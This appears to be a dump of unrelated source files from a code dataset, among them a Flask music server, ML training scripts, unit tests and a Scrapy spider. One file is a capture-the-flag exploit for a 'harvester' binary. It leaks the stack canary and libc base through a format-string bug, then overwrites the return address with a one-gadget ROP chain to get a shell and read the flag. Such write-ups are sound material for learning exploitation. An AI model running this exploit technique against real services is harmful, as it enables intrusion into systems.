recall_precision_list:\n recall_list.append(item[0])\n precision_list.append(item[1])\n\n recall_nparray = np.array(recall_list)\n precision_nparray = np.array(precision_list)\n d_recall = np.diff(recall_nparray, n=1, axis=-1)\n first_d_recall = np.array(recall_list[0])\n d_recall = np.append(first_d_recall, d_recall)\n ap = np.dot(d_recall, precision_nparray)\n\n return ap\n\nif __name__ == '__main__':\n # read json\n import copy\n with open(\"clean_results.json\", 'r') as load_f:\n clean_results = json.load(load_f)\n with open(\"noise_results.json\", 'r') as load_f:\n noise_results = json.load(load_f)\n with open(\"patch_results1.json\", 'r') as load_f:\n v4_result = json.load(load_f)\n threshold = 0.5\n\n plt.plot([0, 1.05], [0, 1.05], '--', color='gray')\n\n\n\n recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(clean_results, clean_results, threshold=threshold)\n recall_nparray_patch = np.array(recall_list_patch)\n precision_nparray_patch = np.array(precision_list_patch)\n plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n\n\n recall_precision_list_noise, recall_list_noise, precision_list_noise = pr(noise_results, clean_results, threshold=threshold)\n recall_nparray_noise = np.array(recall_list_noise)\n precision_nparray_noise = np.array(precision_list_noise)\n plt.plot(recall_nparray_noise, precision_nparray_noise)\n\n\n # recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(class_shift, clean_results, threshold=threshold)\n # recall_nparray_patch = np.array(recall_list_patch)\n # precision_nparray_patch = np.array(precision_list_patch)\n # plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n\n\n # recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(up_results, clean_results, threshold=threshold)\n # recall_nparray_patch = np.array(recall_list_patch)\n # precision_nparray_patch = np.array(precision_list_patch)\n # plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n # recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(class_only, clean_results, threshold=threshold)\n # recall_nparray_patch = np.array(recall_list_patch)\n # precision_nparray_patch = np.array(precision_list_patch)\n # plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(v4_result, clean_results, threshold=threshold)\n recall_nparray_patch = np.array(recall_list_patch)\n precision_nparray_patch = np.array(precision_list_patch)\n plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n plt.gca().set_ylabel('Precision')\n plt.gca().set_xlabel('Recall')\n plt.gca().set_xlim([0, 1.05])\n plt.gca().set_ylim([0, 1.05])\n plt.gca().legend(loc=4)\n\n\n plt.show()\n print()\n # ap = ap(recall_precision_list)\n\n\n","sub_path":"test_patch_by_zzj_after_1.py","file_name":"test_patch_by_zzj_after_1.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"468562626","text":"\"\"\"\nThis spider is a Hypotheker spider created on top of the ATSSpider\nscrapy crawl hypotheker -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://www.hypotheker.nl/over-de-hypotheker/vacatures/\"\n\nSample url:\nhttps://www.hypotheker.nl/over-de-hypotheker/vacatures/\n\"\"\"\n\nfrom hashlib import sha1\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass Hypotheker(ATSSpider):\n\n name = \"hypotheker\"\n Job_Url = compile(r\"\\s*=\\s*'(.*)'\")\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\n '//table[@class=\"jobs-overview\"]/tbody/tr'\n )\n for job in jobs:\n job_url = job.xpath('./@onclick').re(self.Job_Url)\n if job_url:\n job_url = urljoin(response.url, job_url[0])\n meta = {\n 'title': job.xpath('./td[1]/text()').extract(),\n 'jobtype': job.xpath('./td[2]/text()').extract(),\n 'loc': job.xpath('./td[3]/text()').extract(),\n }\n yield Request(\n job_url, callback=self.parse_job_callback(), meta=meta\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath(\n 'description',\n '//div[@class=\"thumb-left offset-top-small offset-bottom\"]/following-sibling::div[1]/node()[following::h2[text()=\"Meer informatie?\"]]'\n )\n if not loader.get_output_value('description'):\n loader.add_xpath(\n 'description',\n '//div[@class=\"thumb-left offset-top-small offset-bottom\"]/following-sibling::div[1]/node()[following::h2[contains(text(), \"Interesse\")]'\n )\n\n loader.add_value(\n 'referencenumber', sha1(response.url).hexdigest(),\n Prefix('%s-' % self.name)\n )\n loader.add_value('location', response.meta['loc'])\n loader.add_value('jobtype', response.meta['jobtype'])\n loader.add_value('title', response.meta['title'])\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n\n\n\n","sub_path":"brightcorp/brightcorp/spiders/hypotheker.py","file_name":"hypotheker.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230515036","text":"__author__ = 'Kris Sterckx'\n\n\nclass SecurityGroupRule:\n\n def __init__(self, ip_protocol=None, port_min=None, port_max=None,\n direction=None, cidr=None, cloud_sg_rule=None, sg=None):\n self.ip_protocol = ip_protocol\n self.port_min = port_min\n self.port_max = port_max\n self.direction = direction\n self.cidr = cidr\n self.cloud_sg_rule = cloud_sg_rule\n self.sg = sg\n","sub_path":"minicloud/model/security_group_rule.py","file_name":"security_group_rule.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455902282","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom pandas_datareader import data as wb\n\n#Title\nst.title(\"Efficient Frontier\")\nimage = Image.open('images/compass.jpg')\nst.image(image,caption='Photo by AbsolutVision on Unsplash')\nst.markdown(\"*'Diversifying sufficiently among uncorrelated risks can reduce portfolio risk toward zero.'* - Harry Markowitz\")\nlist_stocks = ['MSFT', 'AMZN', 'TSLA', 'PG', 'SPOT']\n\nst.subheader(\"First approach\")\n#Mathematics\nst.markdown(\"*Formula*\")\nst.latex(r'''Maximize Rp = \\sum_{i=1}^{n} XiRi\n''')\nst.text(\"Xi: Portfolio weights\")\nst.text(\"Ri: Market Value\")\n\ndef get_stock(stocks):\n pf = pd.DataFrame()\n for element in stocks:\n pf[element] = wb.DataReader(element, data_source='yahoo', start='2018-01-01')['Adj Close']\n return pf\n\nstocks = get_stock(list_stocks)\nst.subheader(\"Stocks table\")\nst.table(stocks.tail(5))\n\nst.subheader('Stocks visualization')\nchart_data = (stocks/stocks.iloc[0]*100)\nst.line_chart(chart_data)\n\n#Return calculation\nst.subheader(\"Calculating returns\")\nst.latex(r''' Rt = \\left(\\frac{Q_t}{Q_t-1}-1\\right)\n''')\n\n#Actualization percentage day-by-day\ndef profit_calc(stocks):\n return stocks.pct_change()\n\n\nprofit = profit_calc(stocks)\nprofit.dropna()\nst.text(\"Formula Stock profit\")\nst.write(profit.sum())\n\nst.subheader(\"Formula Stock Log profit\")\nst.latex(r''' rlog = \\left(\\frac{ln(\\frac{V_f}{V_i})}{t}\\right)\n''')\n\ndef profit_log(stocks):\n return np.log(stocks) - np.log(stocks.shift(1))\n\nlog_profit = profit_log(stocks)\nlog_profit.dropna()\nst.write(log_profit.sum())\nst.write(\"Mean profit:\", log_profit.sum().mean())\n\nst.subheader(\"Optimization for cryptocurrencies users portfolio\")\nst.text(\"Assigne random weights\")\n# Random weights\nnum_stocks = len(list_stocks)\nrandom_array = np.random.random(num_stocks)\nweights = np.random.random(num_stocks)\nweights /= np.sum(weights) #stock1 = stock1/stock1+stock2+stock3\nst.write(weights)\n\n#Calculating return\ncalc_profit = np.sum(weights*log_profit.mean())*252 #Days of trading in 2021\nst.write(\"Profit calculated giving random weights\", calc_profit)\n\n#Variance calculation\nvariance = np.dot(weights.T, np.dot(log_profit.cov()*252, weights))\nst.write(\"Variance:\",variance)\nvolatility = np.sqrt(variance)\nst.write(\"Volatility:\", volatility)\n\nif st.button('Simulation'):\n pass\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"246329763","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#########\n# utils #\n#########\n\ndef sigmoid(x):\n return 1/(1 + np.exp(-x))\n\ndef grad_eout(w, x, y, stochastic):\n if stochastic:\n return sigmoid(-y*w.dot(x.T)) * (-y*x)\n else:\n return np.mean(sigmoid(-y*w.dot(x.T)).reshape(x.shape[0], 1) * (-y.reshape(x.shape[0], 1)*x), axis=0)\n\ndef update_w(w, x, y, eta, stochastic):\n return w - eta * grad_eout(w, x, y, stochastic)\n\n################\n# train & test #\n################\n\ndef train(w, x, y, eta, stochastic):\n return w - eta * grad_eout(w, x, y, stochastic)\n\ndef test(w, x):\n return np.sign(w.dot(x.T))\n\ndef err(y, y_pred):\n return np.mean(y != y_pred)\n\n########\n# main #\n########\n\ndef read_dat(dat_fn):\n dat = np.genfromtxt(dat_fn)\n x_dat = dat[:,:-1]\n y_dat = dat[:,-1]\n return x_dat, y_dat\n\ndef add_const(x):\n new_x = np.ones((x.shape[0], x.shape[1] + 1))\n new_x[:,1:] = x\n return new_x\n\ndef main():\n x_tra, y_tra = read_dat('./dat/hw3_train.dat')\n x_tra = add_const(x_tra)\n x_tes, y_tes = read_dat('./dat/hw3_test.dat')\n x_tes = add_const(x_tes)\n\n T = 2000\n\n # lr = 0.001\n\n def gd_sgd_plt(lr, plt_fn):\n # GD\n eouts_001_gd = []\n w = np.zeros(x_tra.shape[1])\n for t in range(T):\n w = train(w, x_tra, y_tra, lr, False)\n y_pred = test(w, x_tes)\n eouts_001_gd += [err(y_tes, y_pred)]\n\n # SGD\n eouts_001_sgd = []\n w = np.zeros(x_tra.shape[1])\n for t in range(T):\n choose = t % x_tra.shape[0]\n w = train(w, x_tra[choose], y_tra[choose], lr, True)\n y_pred = test(w, x_tes)\n eouts_001_sgd += [err(y_tes, y_pred)]\n\n # plot histogram\n plt.rcParams['font.family'] = 'serif'\n\n plt.plot(range(T), eouts_001_gd, 'C1', label='GD')\n plt.plot(range(T), eouts_001_sgd, 'C2', label='SGD')\n plt.xlabel('Iteratinos')\n plt.ylabel('Eout')\n plt.legend()\n plt.savefig(plt_fn)\n plt.close()\n\n gd_sgd_plt(0.001, 'q9_001')\n gd_sgd_plt(0.01, 'q9_01')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"hw3/code/q9.py","file_name":"q9.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"568484039","text":"import random\r\n\r\ndef create_random_list(n, k):\r\n L = []\r\n for i in range(n):\r\n L.append(random.randint(0, k - 1))\r\n L.sort()\r\n return L\r\n\r\ndef binarne_rek(L, left, right, y):\r\n \"\"\"Wyszukiwanie binarne w wersji rekurencyjnej.\"\"\"\r\n if left <= right:\r\n k = (left+right) // 2\r\n if y == L[k]:\r\n return k\r\n if y < L[k]:\r\n return binarne_rek(L, left, k-1, y)\r\n else:\r\n return binarne_rek(L, k+1, right, y)\r\n return None\r\n\r\ndef main():\r\n myList = create_random_list(100, 10)\r\n print(\"Lista losowych numerów:\", myList)\r\n\r\n find_number = myList[random.randint(0, len(myList) - 1)] # wybieram losowy number z listy\r\n print('Szukany numer:', find_number)\r\n\r\n print('Znaleziony indeks dowolnej szukanej liczby w liście: ', binarne_rek(myList, 0, len(myList)-1, find_number))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Python/Zadania12/12.2.py","file_name":"12.2.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138961462","text":"import os\r\nimport sys\r\nmydir = os.environ['WORKINGDIR']\r\ntemp = os.environ['TEMP']\r\nsys.path.append(mydir+\"\\\\Vigilert\\\\Tests\\\\Stress\")\r\nfrom stress_tests import *\r\n# Comment out the set_driver_on()\r\n#set_driver_on()\r\nstdout = sys.stdout\r\nsys.stdout = open(temp+\"\\\\Vigilert\\\\stress.txt\", 'w')\r\nDURATION = 25\r\nTRIG_MAX = 10000\r\nSEED = None\r\nLOG_FLAG = TRUE\r\nDRIVER_FLAG = FALSE\r\nLOG_FILE = temp+\"\\\\Vigilert\\\\stress\"\r\nPRED_MAX = 2\r\nlong_stress(DURATION, TRIG_MAX, SEED, LOG_FLAG, DRIVER_FLAG, PRED_MAX, LOG_FILE)\r\nsys.stdout.close()\r\nsys.stdout = stdout\r\n","sub_path":"Vigilert/Tests/Stress/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482068658","text":"from __future__ import absolute_import, division, print_function\nimport unittest\n\nimport numpy as np\n\nimport astshim\nfrom astshim.test import MappingTestCase\n\n\nclass TestPermMap(MappingTestCase):\n\n def test_PermMapMatched(self):\n \"\"\"Test a PermMap whose inverse is the inverse of its forward\n \"\"\"\n permmap = astshim.PermMap([2, 3, 1], [3, 1, 2])\n self.assertEqual(permmap.getClass(), \"PermMap\")\n self.assertEqual(permmap.getNin(), 3)\n self.assertEqual(permmap.getNout(), 3)\n\n self.checkBasicSimplify(permmap)\n self.checkCopy(permmap)\n self.checkPersistence(permmap)\n\n indata = np.array([\n [1.1, 2.2, 3.3],\n [-43.5, 1309.31, 0.005],\n ])\n outdata = permmap.tran(indata)\n desoutdata = np.array([\n [3.3, 1.1, 2.2],\n [0.005, -43.5, 1309.31],\n ])\n self.assertTrue(np.allclose(outdata, desoutdata))\n\n self.checkRoundTrip(permmap, indata)\n\n def test_PermMapUnmatched(self):\n \"\"\"Test PermMap with different number of inputs and outputs\n \"\"\"\n permmap = astshim.PermMap([2, 1, 3], [3, 1])\n self.assertEqual(permmap.getClass(), \"PermMap\")\n self.assertEqual(permmap.getNin(), 3)\n self.assertEqual(permmap.getNout(), 2)\n\n self.checkPersistence(permmap)\n\n indata = np.array([1.1, 2.2, -3.3])\n indata.shape = (1, 3)\n outdata = permmap.tran(indata)\n self.assertTrue(np.allclose(outdata, [-3.3, 1.1]))\n\n indata = np.array([1.1, 2.2])\n indata.shape = (1, 2)\n outdata = permmap.tranInverse(indata)\n self.assertTrue(np.allclose(outdata, [2.2, 1.1, np.nan], equal_nan=True))\n\n def test_PermMapWithConstants(self):\n \"\"\"Test a PermMap with constant values\n \"\"\"\n permmap = astshim.PermMap([-2, 1, 3], [2, 1, -1], [75.3, -126.5])\n self.assertEqual(permmap.getClass(), \"PermMap\")\n self.assertEqual(permmap.getNin(), 3)\n self.assertEqual(permmap.getNout(), 3)\n\n indata = np.array([1.1, 2.2, 3.3])\n indata.shape = (1, 3)\n outdata = permmap.tran(indata)\n self.assertTrue(np.allclose(outdata, [2.2, 1.1, 75.3]))\n\n outdata2 = permmap.tranInverse(indata)\n self.assertTrue(np.allclose(outdata2, [-126.5, 1.1, 3.3]))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_permMap.py","file_name":"test_permMap.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"102423424","text":"def write_to_file(data):\n f = open(\"myText.txt\", \"a\")\n f.write(data)\n f.close()\n\ndef read_from_file(filename):\n f = open(filename, \"r\")\n content = f.read()\n f.close()\n print(content)\n\ndef main():\n while True:\n fil = input(\"Vil du lese eller skrive til filen?\")\n if fil.lower() == \"done\":\n break\n elif fil.lower() == \"skrive\":\n write_to_file(input(\"Hva vil du skrive i filen?\"))\n print(\"Filen heter myText.txt\")\n elif fil.lower() == \"lese\":\n read_from_file(input(\"Hva heter filen du vil lese av?\"))\n else:\n print(\"Sorry mac, dette funker ikke\")\n\nmain()\n","sub_path":"Øving 9/fil.py","file_name":"fil.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"524141338","text":"#!/usr/bin/env python2\n\nimport os\nimport platform\nimport pytest\nimport sys\nimport subprocess\n\nscript = '..' + os.sep + 'lypp.py'\ninput = 'input'\n \ndata_path = os.path.dirname(__file__)\nif data_path:\n script = data_path + os.sep + '..' + os.sep + 'lypp.py'\n input = data_path + os.sep + 'input'\n\ndef test_script():\n assert os.path.exists(script)\n \ndef test_if_1():\n global script\n f = input + os.sep + 'ifdef_1'\n t = subprocess.check_output([script, f]).strip()\n e = 'mar'\n assert(e == t)\n\ndef test_if_2():\n global script\n f = input + os.sep + 'ifdef_1'\n t = subprocess.check_output([script, '-D', 'foo', f]).strip()\n e = 'bar\\nmar'\n assert(e == t)\n\n","sub_path":"tests/test_ifdef.py","file_name":"test_ifdef.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312844378","text":"import logging\nimport logging.config\nimport configparser\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom mysql import connector\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.externals import joblib\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM\n\n# コンフィグ\nconfig = configparser.ConfigParser()\nconfig.read('/home/sei0024/fx/conf/fx.conf')\nGRANULARITY = config['oanda']['granularity']\nMYSQL_HOST = config['mysql']['host']\nMYSQL_PORT = config['mysql']['port']\nMYSQL_USER = config['mysql']['user']\nMYSQL_PASSWORD = config['mysql']['password']\nWINDOW_SIZE = int(config['train']['window_size'])\nEPOCHS = int(config['train']['epochs'])\nBATCH_SIZE = int(config['train']['batch_size'])\nUNIT_SIZE = int(config['train']['unit_size'])\nX_SCALER_PATH = config['train']['x_scaler_path']\nY_SCALER_PATH = config['train']['y_scaler_path']\nMODEL_PATH = config['train']['model_path']\n\n# ロギンング\nlogging.config.fileConfig('/home/sei0024/fx/conf/logging.conf')\nlogger = logging.getLogger()\n\nlogger.info('Start Train Process')\n\n# 日付情報取得\nnow = dt.datetime.now()\nfrom_date = (now - dt.timedelta(days=365)).strftime('%Y-%m-%d 00:00:00')\nto_date = now.strftime('%Y-%m-%d 00:00:00')\n\n# データ取得\nlogger.info('Load Datasets from {} to {}'.format(from_date, to_date))\nconn = connector.connect(\n host=MYSQL_HOST,\n port=MYSQL_PORT,\n user=MYSQL_USER,\n # password=MYSQL_PASSWORD\n)\ncur = conn.cursor(dictionary=True)\nsql = \"SELECT open,high,low,close FROM candles.usd_jpy_{granularity} \".format(\n granularity=GRANULARITY.lower())\nsql += \"WHERE time BETWEEN '{from_date}' AND '{to_date}'\".format(\n from_date=from_date, to_date=to_date)\ncur.execute(sql)\ntrain_candles = cur.fetchall()\ncur.close()\n\n# 正解データ追加\ntrain_candles = pd.DataFrame(train_candles)\ntrain_corrects = train_candles.copy().close.shift(-1)\ntrain_candles = train_candles[:-1]\ntrain_corrects = pd.DataFrame(train_corrects[:-1])\n\n# 正規化\nx_scaler = MinMaxScaler(feature_range=(-1, 1))\nx_scaler.fit(train_candles)\ntrain_candles_norm = x_scaler.transform(train_candles)\n\ny_scaler = MinMaxScaler(feature_range=(-1, 1))\ny_scaler.fit(train_corrects)\ntrain_corrects_norm = y_scaler.transform(train_corrects)\n\n# scalerを保存\njoblib.dump(x_scaler, X_SCALER_PATH)\njoblib.dump(y_scaler, Y_SCALER_PATH)\n\n# データセット作成\ntrain_X = np.array([\n train_candles_norm[i:i+WINDOW_SIZE, :4]\n for i in range(len(train_candles_norm) - WINDOW_SIZE)\n])\ntrain_Y = train_corrects_norm[WINDOW_SIZE:]\n\n# 学習\nmodel = Sequential()\nmodel.add(LSTM(UNIT_SIZE, input_shape=(train_X.shape[1], train_X.shape[2])))\nmodel.add(Dense(1, activation='linear'))\nmodel.compile(loss='mse', optimizer='adam', metrics=['mean_absolute_error'])\nhistory = model.fit(\n train_X, train_Y, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2, shuffle=False\n)\nloss = history.history['loss'][-1]\nmae = history.history['mean_absolute_error'][-1]\nlogger.info('loss: {}, mean_absolute_error: {}'.format(loss, mae))\n\n# モデルを保存\nmodel.save(MODEL_PATH)\n\nlogger.info('Finish Train Process')\n","sub_path":"fx/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347471084","text":"from pwn import *\n\nelf = ELF(\"./challenge/harvester\")\nlibc = ELF(\"./challenge/libc.so.6\")\n\nconn = remote(MACHINE_IP, MACHINE_PORT)\n\ndef select_menu(menu):\n conn.recvuntil('> ')\n conn.sendline(menu)\n\n# ANCHOR: format_exploit_fn\ndef format_exploit(progress, index):\n progress.status(\"selecting menu fight\")\n select_menu('1')\n\n progress.status(\"selecting weapon format string attack\")\n conn.recvuntil('> ')\n conn.send(b'%%%d$p' % index);\n conn.recvuntil(b\"Your choice is: \")\n\n progress.status(\"computing value\")\n value = conn.recvline()\n value = value[:len(value) - 8]\n value = 0 if value == b\"(nil)\" else int(value, 16)\n return value\n# ANCHOR_END: format_exploit_fn\n\n# ANCHOR: retrieve_canary_fn\ndef retrieve_canary():\n with log.progress(\"retrieving canary\") as progress:\n return format_exploit(progress, 11)\n# ANCHOR_END: retrieve_canary_fn\n\n# ANCHOR: retrieve_libc_base_address_fn\ndef retrieve_libc_base_address():\n with log.progress(\"retrieving libc base address\") as progress:\n libc_start_main_return = 0x21bf7\n base = format_exploit(progress, 21)\n libc.address = base - libc_start_main_return\n# ANCHOR_END: retrieve_libc_base_address_fn\n\n# ANCHOR: drop_pie_fn\ndef drop_pie(amount):\n with log.progress(\"dropping pies\") as progress:\n progress.status(\"opening inventory menu\")\n select_menu('2')\n\n progress.status(\"choose to drop some pies\")\n conn.recvuntil('> ')\n conn.sendline('y')\n\n progress.status(\"drop specified amount\")\n conn.recvuntil('> ')\n conn.sendline(amount)\n# ANCHOR_END: drop_pie_fn\n\n# ANCHOR: retrieve_shell_fn\ndef retrieve_shell():\n with log.progress(\"retrieving a shell\") as progress:\n progress.status(\"opening stare menu\")\n select_menu('3')\n\n progress.status(\"forging rop\")\n rop = b\"A\" * (0x30 - 0x8)\n rop += p64(canary)\n\n # This value is not important\n rop += p64(0x1234567890abcdef)\n\n # 0x4f3d5 is the offset to open a shell with a single rop\n # See: https://github.com/david942j/one_gadget\n rop += p64(libc.address + 0x4f3d5)\n\n progress.status(\"sending rop\")\n conn.recvuntil('> ')\n conn.send(rop)\n\n progress.status(\"remove error message\")\n conn.recvlines(2)\n# ANCHOR_END: retrieve_shell_fn\n\ndef retrieve_flag():\n with log.progress(\"retrieving the flag\") as progress:\n conn.sendline(\"cat flag.txt\")\n log.success(conn.recvlineS())\n\n\ncanary = retrieve_canary()\nretrieve_libc_base_address()\n\ndrop_pie('-11')\nretrieve_shell()\nretrieve_flag()\n","sub_path":"src/cyber-apocalypse-2021/pwn/harvester/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82027788","text":"from flask import Flask, render_template, request, jsonify, Response, send_from_directory, send_file\r\nfrom flask_cors import CORS\r\n\r\nimport unicodedata\r\n\r\nfrom songs import *\r\n\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n\treturn render_template('index.html')\r\n\r\n@app.route('/get_songs', methods=['GET'])\r\ndef get_songs():\r\n\tsongs = get_current_songs()\r\n\treturn jsonify(songs)\r\n\r\n@app.route('/new_songs', methods=['GET'])\r\ndef new_songs():\r\n\tsongs = get_new_pair()\r\n\treturn jsonify(songs)\r\n\r\n@app.route('/song/', methods=['GET'])\r\ndef play_song(filename):\r\n\treturn send_from_directory('../../../../Master', unicodedata.normalize('NFC', filename))\r\n\r\n@app.route('/song//art', methods=['GET'])\r\ndef get_art(filename):\r\n\tart = get_album_art('/' + filename)\r\n\tif art == None:\r\n\t\treturn send_file(\"./unknown.jpg\")\r\n\treturn art\r\n\r\n@app.route('/song//plays', methods=['POST'])\r\ndef record_play(filename):\r\n\treturn jsonify(update_plays('/' + filename))\r\n\r\n@app.route('/song//replaygain', methods=['GET'])\r\ndef replaygain(filename):\r\n\treturn jsonify({'replaygain': get_replaygain('../../../../Master/' + unicodedata.normalize('NFC', filename))})\r\n\r\n@app.route('/elo', methods=['POST'])\r\ndef elo():\r\n\tdiff = adjust_elo(request.get_json().get('a'), request.get_json().get('b'), request.get_json().get('result'))\r\n\treturn jsonify({'result': diff})\r\n\r\n@app.route('/queue', methods=['GET', 'POST', 'DELETE'])\r\ndef queue():\r\n\t# print_data(request.args.keys())\r\n\t# print(request.args.keys())\r\n\tif request.method == 'GET':\r\n\t\tprint('get')\r\n\t\treturn jsonify(get_from_queue())\r\n\telif request.method == 'POST':\r\n\t\treturn jsonify(add_to_queue(request.get_json().get('song')))\r\n\telif request.method == 'DELETE':\r\n\t\tapp.logger.error('delete')\r\n\t\tprint('delete')\r\n\t\treturn jsonify(clear_queue())\r\n\t\t\r\n@app.route('/queue/', methods=['DELETE'])\r\ndef remove_song(index):\r\n\tif request.method == 'DELETE':\r\n\t\treturn jsonify(remove_from_queue(int(index)))\r\n\r\n@app.route('/stats', methods=['GET'])\r\ndef get_stats():\r\n\treturn jsonify(get_songs_stats())\r\n\r\n@app.route('/top', methods=['GET'])\r\ndef get_top():\r\n\tn = 10\r\n\tif request.args.get('n'):\r\n\t\tn = int(request.args.get('n'))\r\n\treturn jsonify(get_top_songs(n))\r\n\r\n@app.route('/worst', methods=['GET'])\r\ndef get_worst():\r\n\tn = 10\r\n\tif request.args.get('n'):\r\n\t\tn = int(request.args.get('n'))\r\n\treturn jsonify(get_top_songs(n, False))\r\n\r\n@app.route('/most_played', methods=['GET'])\r\ndef most_played():\r\n\tn = 10\r\n\tif request.args.get('n'):\r\n\t\tn = int(request.args.get('n'))\r\n\treturn jsonify(get_most_played_songs(n))\r\n\r\n@app.route('/song//rank', methods=['GET'])\r\ndef get_rank(filename):\r\n\treturn jsonify(get_song_rank(filename))\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(host='0.0.0.0', port=3333, debug=True)","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549964293","text":"\nfrom ui_canvas import ui\nimport camera\nimport KPU as kpu\n\n# classify20\n\nanchor = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)\nclasses = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\nclass HowMany():\n\n is_load = False\n\n task, things = None, None\n\n def load():\n if HowMany.is_load == False:\n #print(HowMany.load)\n HowMany.task = kpu.load(0x5C0000)\n #task = kpu.load(\"/sd/0x5C0000_20class.kmodel\")\n kpu.init_yolo2(HowMany.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))\n HowMany.is_load = True\n\n def work(img):\n\n HowMany.things = kpu.run_yolo2(HowMany.task, img)\n if HowMany.things:\n\n for pos in range(len(HowMany.things)):\n i = HowMany.things[pos]\n img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())\n img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))\n\n return img\n\n def free():\n #print(HowMany.free)\n try:\n if HowMany.is_load:\n kpu.deinit(HowMany.task)\n HowMany.is_load = False\n except Exception as e:\n print(e) # see py_kpu_deinit error will mp_raise_TypeError\n\nclass MaybeIs():\n\n is_load = False\n task, things, result = None, None, None\n\n def load():\n if MaybeIs.is_load == False:\n #print(MaybeIs.load)\n MaybeIs.task = kpu.load(0x5C0000)\n #task = kpu.load(\"/sd/0x5C0000_20class.kmodel\")\n kpu.init_yolo2(MaybeIs.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))\n MaybeIs.is_load = True\n\n def work(img):\n\n MaybeIs.things = kpu.run_yolo2(MaybeIs.task, img)\n if MaybeIs.things:\n\n value, obj = 0, None\n for k in range(len(MaybeIs.things)):\n if value < MaybeIs.things[k].value():\n value, obj = MaybeIs.things[k].value(), MaybeIs.things[k]\n\n i = MaybeIs.things[k]\n MaybeIs.result = classes[i.classid()]\n img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())\n img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))\n\n return img\n\n def free():\n #print(MaybeIs.free)\n try:\n if MaybeIs.is_load:\n kpu.deinit(MaybeIs.task)\n MaybeIs.is_load = False\n except Exception as e:\n print(e) # see py_kpu_deinit error will mp_raise_TypeError\n\n\nif __name__ == \"__main__\":\n\n ui.height, ui.weight = 480, 320\n def test_ai_camera():\n\n @ui.warp_template(ui.blank_draw)\n def howmany():\n tmp = camera.obj.get_image()\n HowMany.work(tmp)\n ui.canvas.draw_image(tmp, 0, 